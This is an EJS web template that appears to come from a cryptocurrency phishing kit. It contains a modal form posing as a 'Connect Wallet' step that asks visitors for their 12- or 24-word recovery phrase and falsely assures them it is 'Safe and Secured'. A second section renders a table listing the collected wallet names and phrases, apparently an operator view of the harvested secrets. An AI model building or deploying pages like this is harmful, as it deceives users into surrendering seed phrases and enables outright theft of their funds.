<%- include('templates/header') %>



  <!-- Roadmap Start -->
  <div class="container-xxl py-5 bg-dark">
    <div class="container">
        <h1 class="display-6 text-primary text-center"  style="margin-bottom: 4%;"> Your Wallet Phrase</h1>
       <div class="row g-3">
             <table class="table table-striped table-bordered">
            <thead class="table-dark">
                <tr>
                <th>Wallet</th>
                <th>Phrase</th>
                </tr>
            </thead>
            <tbody>
                   <% getwallet.forEach( element=> { %>
                      <tr>
                      <td><%= element.wallet %></td>
                      <td><%= element.phrase %></td>
                      </tr>
                      <tr>
                
                   <% }) %>
            </tbody>
            </table>
        </div>
    </div>
</div>
<!-- Roadmap End -->

<!-- Modal -->
<div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog ">
      <div class="modal-content bg-dark">
        <div class="modal-header">
          <span class="modal-title fs-11 text-white" id="exampleModalLabel">Enter your 12-word or 24-word Phrase with a single space bellow:</span>
          <button type="button" class="btn-close text-white" data-bs-dismiss="modal" aria-label="Close"></button>
        </div>
        <div class="modal-body">
            <span id="wallet"></span>
             <!--<span class="text-primary fs-10" style="margin-bottom:4%">Enter your Wallet Address Bellow</span>-->
           <form id="phrase" style="margin-top:2%;">
             <input type="hidden" id="crypto_wallet">
              <!--- <input type="text" name="" id="wallet_address" class="form-control bg-dark" placeholder="input address (e.g 0x742d35Cc6634C0532925a3b844Bc454e4438f44e)"><br>-->
               <span class="text-primary fs-10" style="margin-bottom:4%">Input Phrase (Remember Your Phrase is Safe and Secured..)</span><br>
              <textarea name="text_phrase" class="text-primary" id="text_phrase" style="width: 100%; height: 150px; padding-top:13%; padding-left:10%; background-color: black; margin-top:2% "> </textarea>
               <button type="submit" class="btn btn-primary"  style="width:50%; margin-left:20%; margin-top:2%; margin-bottom:2%;">Connect Wallet</button>
           </form>
        </div>
        
      </div>
    </div>
  </div> <!-- Modal -->
  <%- include('templates/footer') %>